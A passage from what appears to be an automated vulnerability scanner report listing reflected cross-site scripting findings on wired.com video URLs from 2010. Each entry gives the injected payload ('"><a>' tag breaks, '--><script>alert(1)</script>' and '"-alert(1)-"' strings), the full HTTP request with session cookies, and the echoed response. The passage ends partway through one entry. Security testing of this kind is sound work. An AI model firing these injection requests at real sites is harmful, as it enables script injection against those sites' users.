1.1135. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc300"><a>678c092b783 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videocc300"><a>678c092b783/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29436
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:33 GMT
Date: Mon, 22 Nov 2010 00:35:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videocc300"><a>678c092b783 ss_latest-videos c_latest">
...[SNIP]...

1.1136. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 613d3--><script>alert(1)</script>43b9bab8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video613d3--><script>alert(1)</script>43b9bab8598/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29475
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:32 GMT
Date: Mon, 22 Nov 2010 00:36:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video613d3--><script>alert(1)</script>43b9bab8598/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001
-->
...[SNIP]...

1.1137. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a9b"><a>c4d804fa51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos28a9b"><a>c4d804fa51f/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:38 GMT
Date: Mon, 22 Nov 2010 00:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos28a9b"><a>c4d804fa51f c_latest">
...[SNIP]...

1.1138. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81130"-alert(1)-"2f35c747696 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos81130"-alert(1)-"2f35c747696/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=284
Expires: Mon, 22 Nov 2010 00:42:21 GMT
Date: Mon, 22 Nov 2010 00:37:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","1815816633","glab-galaxy-tab-windows-phone-7-boxee-box","latest-videos81130"-alert(1)-"2f35c747696","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1139. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf32"><a>9773438e8ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latestddf32"><a>9773438e8ff/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:40 GMT
Date: Mon, 22 Nov 2010 00:37:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latestddf32"><a>9773438e8ff">
...[SNIP]...

1.1140. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a4e"-alert(1)-"b2ff811f214 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest88a4e"-alert(1)-"b2ff811f214/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=285
Expires: Mon, 22 Nov 2010 00:43:36 GMT
Date: Mon, 22 Nov 2010 00:38:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest88a4e"-alert(1)-"b2ff811f214","latest-videos","1815816633","glab-galaxy-tab-windows-phone-7-boxee-box","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1141. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a57f0"-alert(1)-"a7d134a715c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633a57f0"-alert(1)-"a7d134a715c/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:19 GMT
Date: Mon, 22 Nov 2010 00:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633a57f0"-alert(1)-"a7d134a715c","glab-galaxy-tab-windows-phone-7-boxee-box","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1142. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87ba6"-alert(1)-"0495acaed40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box87ba6"-alert(1)-"0495acaed40/673489628001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=280
Expires: Mon, 22 Nov 2010 00:44:07 GMT
Date: Mon, 22 Nov 2010 00:39:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "glab-galaxy-tab-windows-phone-7-boxee-box87ba6"-alert(1)-"0495acaed40","latest-videos","latest","1815816633","video","673489628001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1143. http://www.wired.com/video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64146"-alert(1)-"48511d6ee84 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/67348962800164146"-alert(1)-"48511d6ee84 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:34 GMT
Date: Mon, 22 Nov 2010 00:39:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "67348962800164146"-alert(1)-"48511d6ee84","latest-videos","latest","1815816633","glab-galaxy-tab-windows-phone-7-boxee-box","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1144. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 24bfa--><script>alert(1)</script>3c46c277be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video24bfa--><script>alert(1)</script>3c46c277be6/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29473
Vary: Accept-Encoding
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:45:15 GMT
Date: Mon, 22 Nov 2010 00:40:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video24bfa--><script>alert(1)</script>3c46c277be6/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001
-->
...[SNIP]...

1.1145. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84273"><a>254c69cc0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video84273"><a>254c69cc0f7/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29434
Vary: Accept-Encoding
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:44:33 GMT
Date: Mon, 22 Nov 2010 00:39:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video84273"><a>254c69cc0f7 ss_latest-videos c_latest">
...[SNIP]...

1.1146. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><a>8f3c503be2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos2a13f"><a>8f3c503be2f/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:45:28 GMT
Date: Mon, 22 Nov 2010 00:40:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos2a13f"><a>8f3c503be2f c_latest">
...[SNIP]...

1.1147. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10a5c"-alert(1)-"9fe310adf50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos10a5c"-alert(1)-"9fe310adf50/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:46:28 GMT
Date: Mon, 22 Nov 2010 00:41:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos10a5c"-alert(1)-"9fe310adf50","latest","1815816633","660653903001","glab-microsoft-kinect-fall-test-skyfire","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1148. http://www.wired.com/video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc48"-alert(1)-"092d67e8836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

